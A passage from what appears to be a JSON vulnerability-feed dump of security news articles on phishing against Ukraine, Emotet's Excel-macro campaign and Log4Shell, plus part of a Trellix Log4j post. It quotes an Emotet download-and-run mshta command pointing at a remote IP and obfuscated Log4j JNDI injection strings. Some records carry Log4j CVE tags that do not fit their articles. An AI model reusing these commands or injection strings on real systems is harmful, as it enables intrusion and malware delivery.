actor that Ukraine previously said is part of the Belarusian Ministry of Defense.\n\nMeanwhile, there have been a recent spate of distributed denial-of-service (DDoS) attacks against Ukrainian government sites, such as the Ministry of Foreign Affairs and the Ministry of Internal Affairs, as well as key services that help Ukrainians find information, such as Liveuamap, according to Google TAG.\n\nChina\u2019s Mustang Panda also has joined the fray, using the war in Ukraine to target European entities with lures related to the Ukrainian invasion in a recent phishing campaign. China\u2019s government is one of the few around the world backing Putin in the conflict.\n\n\u201cWe\u2019re sharing this information to help raise awareness among the security community and high risk users,\u201d Huntley wrote in the post.\n\n## **Phishing Flurry**\n\nFancy Bear, the APT behind attacks against the [2020 Tokyo Olympics](<https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/>) and [elections in the European Union](<https://threatpost.com/cybercriminals-impersonate-russian-apt-fancy-bear-to-launch-ddos-attacks/149578/>), most recently has been targeting users of ukr.net \u2013 owned by the Ukrainian media company URKNet \u2013 with \u201cseveral large credential phishing campaigns,\u201d Huntley wrote.\n\n\u201cThe phishing emails are sent from a large number of compromised accounts (non-Gmail/Google), and include links to attacker controlled domains,\u201d according to the post.\n\nIn two recent campaigns, TAG saw attackers using newly created Blogspot domains as the initial landing page, which then redirected targets to credential phishing pages. At this time, all known attacker-controlled Blogspot domains have been taken down, Huntley added.\n\nMeanwhile, Ghostwriter has conducted similarly motivated phishing campaigns over the past week against Polish and Ukrainian government and military organizations, according to Google TAG. The group also has been targeting webmail users from the following providers in the region: i.ua, meta.ua, rambler.ru, ukr.net, wp.pl and yandex.ru.\n\nGoogle TAG blocked a number of credential phishing domains that researchers observed during the campaigns through Google Safe Browsing, according to the post. Those domains included the following: accounts[.]secure-ua[.]website, i[.]ua-passport[.]top, login[.]creditals-email[.]space, post[.]mil-gov[.]space and verify[.]rambler-profile[.]site.\n\n## **Capitalizing on Conflict**\n\nNot to be outdone, China\u2019s Mustang Panda, aka Temp.Hex**,** HoneyMyte, TA416 or RedDelta, is using phishing lures related to the conflict in the Ukraine to target European organizations.\n\n\u201cTAG identified malicious attachments with file names such as [\u2018Situation at the EU borders with Ukraine.zip\u2019](<https://www.virustotal.com/gui/file/8a7fbafe9f3395272548e5aadeb1af07baeb65d7859e7a1560f580455d7b1fac/>) which contain an executable of the same name that is a basic downloader,\u201d Huntley explained in the post. When executed, the file downloads several additional files that install the final, malicious payload, according to TAG.\n\nWhile Huntley noted that targeted Europe represents a shift for the threat actor \u2013 which typically targets entities in Southeast Asia \u2013 Mustang Panda has been active against EU entities before, most notably targeting Rome\u2019s Vatican and Catholic Church-related organizations with [a spearphishing campaign](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) in September 2020.\n\nTo mitigate the APT\u2019s latest phishing attacks, TAG has alerted relevant authorities of its findings, Huntley noted.\n\n## **Expanding DDoS Protection**\n\nAs APTs step up phishing attacks against Ukrainian targets, key government and service-oriented websites in the country also are facing a new barrage of DDoS attacks, as mentioned.\n\nAs these attacks are likely to continue, Google has expanded eligibility for [Project Shield](<https://projectshield.withgoogle.com/landing>), the company\u2019s free protection against DDoS attacks, to \u201cUkrainian government websites, embassies worldwide and other governments in close proximity to the conflict,\u201d Huntley wrote. More than 150 websites in Ukraine, including many news organizations, are currently using the service.\n\nProject Shield allows Google to absorb the bad traffic in a DDoS attack so the targeted organization can continue operating and defend against these attacks, according to the post. The company is recommending that eligible organizations[ register](<https://support.projectshield.withgoogle.com/s/?language=en_US>) for Project Shield in the wake of increased DDoS attack activity, Huntley wrote.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T14:07:55", "type": "threatpost", "title": "Russian APTs Furiously Phish Ukraine \u2013 Google", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T14:07:55", "id": "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "href": "https://threatpost.com/russian-apts-phishing-ukraine-google/178819/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T13:47:16", "description": "The infamous Emotet malware has switched tactics yet again, in an email campaign propagating through malicious Excel files, researchers have found.\n\nResearchers at Palo Alto Networks Unit 42 have observed a new infection approach for the high-volume malware, which is known to modify and change its attack vectors to avoid detection so it can continue to do its nefarious work, they [wrote in a report](<https://unit42.paloaltonetworks.com/new-emotet-infection-method/>) published online Tuesday.\n\n\u201cEmotet\u2019s new attack chain reveals multiple stages with different file types and obfuscated script before arriving at the final Emotet payload,\u201d Unit 42 researchers Saqib Khanzada, Tyler Halfpop, Micah Yates and Brad Duncan wrote.\n\nThe new attack vector\u2014discovered on Dec. 21 and still active\u2013delivers an Excel file that includes an obfuscated Excel 4.0 macro through socially engineered emails.\n\n\u201cWhen the macro is activated, it downloads and executes an HTML application that downloads two stages of PowerShell to retrieve and execute the final Emotet payload,\u201d researchers wrote.\n\n## **The Malware That Won\u2019t Die**\n\nEmotet started life as a banking trojan in 2014 and has continually evolved to become a full-service threat-delivery mechanism, at one point existing as a botnet that held more than 1.5 million machines under its control, according to Check Point Software. Typical consequences of TrickBot infections are bank-account takeover, high-value wire fraud and ransomware attacks.\n\nIndeed, at the end of its original heyday, the estimated damage from Emotet was around $2.5 billion dollars, researchers have said.\n\nThen, Emotet appeared to be [put out of commission](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) by an international law-enforcement collaborative takedown of a network of hundreds of botnet servers supporting the system in January 2021. However, it resurfaced [last November](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) on the back of frequent partner-in-crime [TrickBot](<https://threatpost.com/trickbot-cybercrime-elite-affiliates/175510/>) \u2014 and now continues to [be a threat.](<https://threatpost.com/emotets-behavior-spread-are-omens-of-ransomware-attacks/176845/>)\n\nSince its return, Emotet has used [thread hijacking](<https://threatpost.com/emotet-returns-100k-mailboxes/162584/>) and other types of tactics as part of novel attack methods..\n\n\u201cThis technique generates fake replies based on legitimate emails stolen from mail clients of Windows hosts previously infected with Emotet,\u201d Unit 42 researchers wrote. \u201cThe botnet uses this stolen email data to create fake replies impersonating the original senders.\u201d\n\nExamples of this method included using links to install a fake Adobe Windows App Installer Package that were [reported](<https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/>) in December, researchers wrote.\n\n## **Using Excel Macros**\n\nThe new Emotet infection method using Excel macros also has several variations, according to Unit 42.\n\n\u201cIn some cases, Emotet uses a password-protected .ZIP archive as an attachment to its email,\u201d researchers explained. \u201cIn other cases, Emotet uses an Excel spreadsheet directly attached to the email.\u201d\n\nResearchers outlined an email sent by the Emotet botnet on Jan. 27 that uses a stolen email thread from June 2021. The email uses a lure heralding a \u201cnew announcement\u201d to a \u201cvaluable supplier\u201d and contains an encrypted .ZIP file in an attempt to bypass security systems, researchers wrote. It also includes the password to the .ZIP file in the email, so the victim can extract its contents.\n\n\u201cThe encrypted .ZIP file contains a single Excel document with Excel 4.0 macros,\u201d researchers wrote \u201cThese macros are an old Excel feature that is frequently abused by malicious actors. The victim must enable macros on a vulnerable Windows host before the malicious content is activated.\u201d\n\nOnce that\u2019s done, the macro code executes cmd.exe to run mshta.exe, with an argument to retrieve and execute a remote HTML application that downloads and executes additional PowerShell code, researchers wrote.\n\n\u201cThe code utilizes hex and character obfuscation in order to attempt to bypass static detection measures,\u201d they explained. \u201cThe deobfuscated command string that is executed is: cmd /c mshta hxxp://91.240.118[.]168/se/s.html.\u201d\n\nThe initial obfuscated PowerShell script connects to hxxp://91.240.118[.]168/se/s.png, a URL that returns text-based script for a second-stage set of PowerShell code designed to retrieve an Emotet binary.\n\n\u201cThis second-stage PowerShell code\u2026contains 14 URLs to retrieve the Emotet binary,\u201d researchers wrote. \u201cThe script attempts each URL until an Emotet binary is successfully downloaded.\u201d\n\nHaving multiple URLs in its attack chain is aimed at making it more resilient in the event that one of the URLs is taken down, researchers said. The final stage of the attack chain occurs when the Emotet .DLL loads an encrypted PE from its resource section, they added.\n\n## **Microsoft to Block Macros by Default**\n\nLast week, Microsoft [announced a plan](<https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805>) to disable all macros by default in some applications, acknowledging that the mechanism is one of the world\u2019s most popular ways to deliver malware.\n\n\u201cFor the protection of our customers, we need to make it more difficult to enable macros in files obtained from the internet,\u201d the computing giant noted. \u201cVBA macros obtained from the internet will now be blocked by default.\u201d\n\nThree popular Office apps, Word, Excel and PowerPoint, plus Access and Visio, are affected by the change.\n\n\u201cFor macros in files obtained from the internet, users will no longer be able to enable content with a click of a button,\u201d Microsoft said. \u201cThe default is more secure and is expected to keep more users safe including home users and information workers in managed organizations.\u201d\n\nStarting in late April, instead of a button to \u201cenable macros,\u201d users will be prompted with a \u201clearn more\u201d button that will take them to additional information before they can activate macros within a document.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>), \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T13:39:33", "type": "threatpost", "title": "Emotet Now Spreading Through Malicious Excel Files", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-16T13:39:33", "id": "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "href": "https://threatpost.com/emotet-spreading-malicious-excel-files/178444/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:35", "description": "The internet has a fast-spreading, malignant cancer \u2013 otherwise known as the Apache Log4j logging library exploit \u2013 that\u2019s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.\n\nMost of the attacks focus on cryptocurrency mining done on victims\u2019 dimes, as seen by [Sophos](<https://twitter.com/SophosLabs/status/1470213371521810432>), [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/?ranMID=24542&ranEAID=TnL5HPStwNw&ranSiteID=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&epi=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&irgwc=1&OCID=AID2200057_aff_7593_1243925&tduid=%28ir__cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600%29%287593%29%281243925%29%28TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA%29%28%29&irclickid=_cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600>) and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.\n\nAccording to [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) researchers, beyond coin-miners, they\u2019ve also seen installations of [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.\n\nAlso, it could get a lot worse. Cybersecurity researchers at [Check Point warned](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.\n\n\u201cSince Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,\u201d they said.\n\nThe flaw, which is uber-easy to exploit, has been named [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>). It\u2019s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. It first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.\n\n## Mutations May Enable Exploits to Slip Past Protections\n\nOn Monday, Check Point reported that Log4Shell\u2019s new, malignant offspring can now be exploited \u201ceither over HTTP or HTTPS (the encrypted version of browsing),\u201d they said.\n\nThe more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. \u201cIt means that one layer of protection is not enough, and only multilayered security postures would provide a resilient protection,\u201d they wrote.\n\nBecause of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.\n\n## Tactical Shifts\n\nBesides variations that can slip past protections, researchers are also seeing new tactics.\n\nLuke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that initial exploit attempts were basic call backs, with the initial exploit attempt coming from TOR nodes. They mostly pointed back to \u201cbingsearchlib[.]com,\u201d with the exploit being passed into the User Agent or the Uniform Resource Identifier (URI) of the request.\n\nBut since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. Notably, there\u2019s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.\n\n\u201cThis originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,\u201d Richards explained in an email. Following this, the attackers started obfuscating the Java Naming and Directory Interface (JDNI) string itself, by taking advantage of other translation features of the JDNI process.\n\nHe offered these examples:\n\n${jndi:${lower:l}${lower:d}a${lower:p}://world80 \n${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}// \n${jndi:dns://\n\n\u2026All of which achieve the same objective: \u201cto download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,\u201d Richards said.\n\n## Bug Has Been Targeted All Month\n\nAttackers have been buzzing around the Log4Shell vulnerability since at least Dec. 1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.\n\nOn Sunday, Sophos researchers [said](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1470213367142965254%7Ctwgr%5E%7Ctwcon%5Es1_c10&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost-new.php>) that they\u2019d \u201calready detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,\u201d noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.\n\n> Sophos has already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability, and log searches by other organizations (including Cloudflare) suggest the vulnerability may have been openly exploited for weeks. 11/16 [pic.twitter.com/dbAXG5WdZ8](<https://t.co/dbAXG5WdZ8>)\n> \n> \u2014 SophosLabs (@SophosLabs) [December 13, 2021](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw>)\n\n\u201cEarliest evidence we\u2019ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,\u201d Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) on Saturday. \u201cThat suggests it was in the wild at least nine days before publicly disclosed. However, don\u2019t see evidence of mass exploitation until after public disclosure.\u201d\n\nOn Sunday, Cisco Talos [chimed in](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>) with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. \u201cIt is recommended that organizations expand their hunt for scanning and exploit activity to this date,\u201d it advised.\n\n## Exploits Attempted on 40% of Corporate Networks\n\nCheck Point said on Monday that it\u2019s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it\u2019s seen more than 100 attempts to exploit the vulnerability per minute.\n\nAs of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.\n\nThe map below illustrates the top targeted geographies.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/13121325/map.jpg>)\n\nTop affected geographies. Source: Check Point.\n\nHyperbole isn\u2019t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: \u201cIt wouldn\u2019t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,\u201d Dali noted via email on Monday. \u201cConnecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren\u2019t taken right away.\u201d\n\nAs has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability \u201cis relatively easy to exploit, and we\u2019ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,\u201d Dali reiterated. \u201cHopefully every organization running Java has the ability to secure, configure and manage it. If Java is being used in production systems IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.\u201d\n\nThis situation is rapidly evolving, so keep an eye out for additional news. Below are some of the related pieces we\u2019ve seen, along with some of the new protections and detection tools.\n\n## More News\n\n * ** **[**Linux botnets have already exploited the flaw.**](<https://securityaffairs.co/wordpress/125562/malware/linux-botnets-log4shell-flaw.html?utm_source=feedly&utm_medium=rss&utm_campaign=linux-botnets-log4shell-flaw>) [NetLab 360](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) reported on Saturday that two of its honeypots have been attacked by the [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>) and [Mirai](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) botnets. Following detection of those attacks, the Netlab 360 team found [other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) on the hunt for the Log4Shell vulnerability, including the DDoS family Elknot, the mining family m8220, SitesLoader, xmrig.pe, xmring.ELF, attack tool 1, attack tool 2, plus one unknown and a PE family. [BleepingComputer](<https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/>) also reports that it\u2019s observed the threat actors behind the [Kinsing](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) backdoor and cryptomining botnet \u201cheavily abusing the Log4j vulnerability.\u201d\n * [**CISA has added Log4Shell to the Known Exploited Vulnerabilities Catalog**](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog>).\n * [**Quebec shut down thousands of sites**](<https://securityaffairs.co/wordpress/125556/hacking/quebec-shut-down-sites-log4shell.html?utm_source=feedly&utm_medium=rss&utm_campaign=quebec-shut-down-sites-log4shell>) after disclosure of the Log4Shell flaw. \u201c\u201dWe need to scan all of our systems,\u201d said Canadian Minister Responsible for Digital Transformation and Access to Information Eric Caire in a news conference. \u201cWe\u2019re kind of looking for a needle in a haystack.\u201d\n\n## New Protections, Detection Tools\n\n * On Saturday, Huntress Labs released a tool \u2013 [available here](<https://log4shell.huntress.com/>) \u2013 to help organizations test whether their applications are vulnerable to CVE-2021-44228.\n * Cybereason released [Logout4Shell](<https://github.com/apache/logging-log4j2/pull/608>), a \u201cvaccine\u201d for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off.\n\n## Growing List of Affected Manufacturers, Components\n\nAs of Monday, the internet was still in meltdown drippy mode, with an ever-growing, crowd-sourced list [hosted on GitHub](<https://github.com/YfryTchsGD/Log4jAttackSurface>) that only scratches the surface of the millions of applications and manufacturers that use log4j for logging. The list indicates whether they\u2019re affected by Log4Shell and provides links to evidence if they are.\n\nSpoiler alert: Most are, including:\n\n * [Amazon](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Amazon.md>)\n * [Apache Druid](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheDruid.md>)\n * [Apache Solr](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheSolr.md>)\n * [Apache Struts2](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheStruts2.md>)\n * [Apple](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/apple.md>)\n * [Baidu](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Baidu.md>)\n * [CloudFlare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/CloudFlare.md>)\n * [DIDI](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/DIDI.md>)\n * [ElasticSearch](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ElasticSearch.md>)\n * [Google](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Google.md>)\n * [JD](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/JD.md>)\n * [LinkedIn](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/LinkedIn.md>)\n * [NetEase](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/NetEase.md>)\n * [Speed camera LOL](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/SpeedCamera.md>)\n * [Steam](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Steam.md>)\n * [Tesla](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tesla.md>)\n * [Tencent](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tencent.md>)\n * [Twitter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Twitter.md>)\n * [VMWare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWare.md>)\n * [VMWarevCenter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWarevCenter.md>)\n * [Webex](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Webex.md>)\n\n## A Deep Dive and Other Resources\n\n * **Immersive Labs** has posted a[ hands-on lab](<https://www.linkedin.com/posts/immersive-labs-limited_in-december-a-zero-day-vulnerability-affecting-activity-6876088019028336640-MtYh>) of the incident.\n * **Lacework** has published a [blog post ](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) regarding how the news affects security best practices at the developer level.\n * **NetSPI** has published a [blog post](<https://www.netspi.com/blog/executive/security-industry-trends/log4j-zero-day-vulnerability-impact/>) that includes details on Log4Shell\u2019s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.\n\nThis is a developing story \u2013 stay tuned to Threatpost for ongoing coverage.\n\n121321 13:32 UPDATE 1: Added input from Dor Dali and Luke Richards. \n121321 14:15 UPDATE 2: Added additional botnets detected by NetLab 360.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. \n_** \n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:14:46", "type": "threatpost", "title": "Log4Shell Is Spawning Even Nastier Mutations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:14:46", "id": "THREATPOST:34D98758A035C36FED68DDD940415845", "href": "https://threatpost.com/apache-log4j-log4shell-mutations/176962/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2022-01-19T00:00:00", "description": "# Log4J and The Memory That Knew Too Much\n\nBy Trellix \u00b7 January 19, 2022\n\n_By Guilherme Venere, Ismael Valenzuela, Carlos Diaz, Cesar Vargas, Leandro Costantino, Juan Olle, Jose Luis Sanchez Martinez, AC3 Team_\n\n_Collaborators: Steve Povolny, Douglas McKee, Mark Bereza, Frederick House, Dileep Kumar Jallepalli_\n\nThere is never a dull moment in the cybersecurity industry and there is no better time than now to embrace this notion as an advantage and catalyst for business empowerment. \n\nCurrently, professionals across the globe continue to combat the latest threat facing businesses where no vertical is immune. We\u2019ve seen an increase in the analysis and patching of the Log4Shell vulnerability in the Apache Log4j Java-based logging platform for a good reason - Log4j is one of, if not the most popular logging applications used by developers. But businesses also need to think beyond patching, as we are seeing Log4Shell shift what we think of as an attack surface. \n\nThe potential for large-scale damage and this vulnerability to proliferate is high, so this impact must be taken seriously now to better plan and safeguard against the next major flaw.\n\nWhile patching is critical, it shouldn\u2019t be a static or one-time fix to ensure infrastructure security. Instead, an always-on approach combining extensive monitoring, assessment, scanning, and forensics must be implemented to provide the agility needed against today\u2019s more modern threats. \n\nSpecifically, in this post we show how an endpoint solution with performant memory scanning capabilities can effectively detect active exploitation scenarios and complement your company\u2019s network security capabilities to create a new kind of resiliency for your organization. \n\n##### Background\n\nAs those across the security industry are aware, yet another new vulnerability affecting a widely used library was released just in time for the 2021 holiday season. CVE-2021-44228 reported a vulnerability in the Log4j Java library affecting applications and web sites using the library to perform logging.\n\nThe vulnerability allowed an attacker to coerce the vulnerable site or application to load and execute a malicious Java code from an untrusted remote location. Attack vectors are varied but the most common is associated with the attacker sending crafted strings as part of a 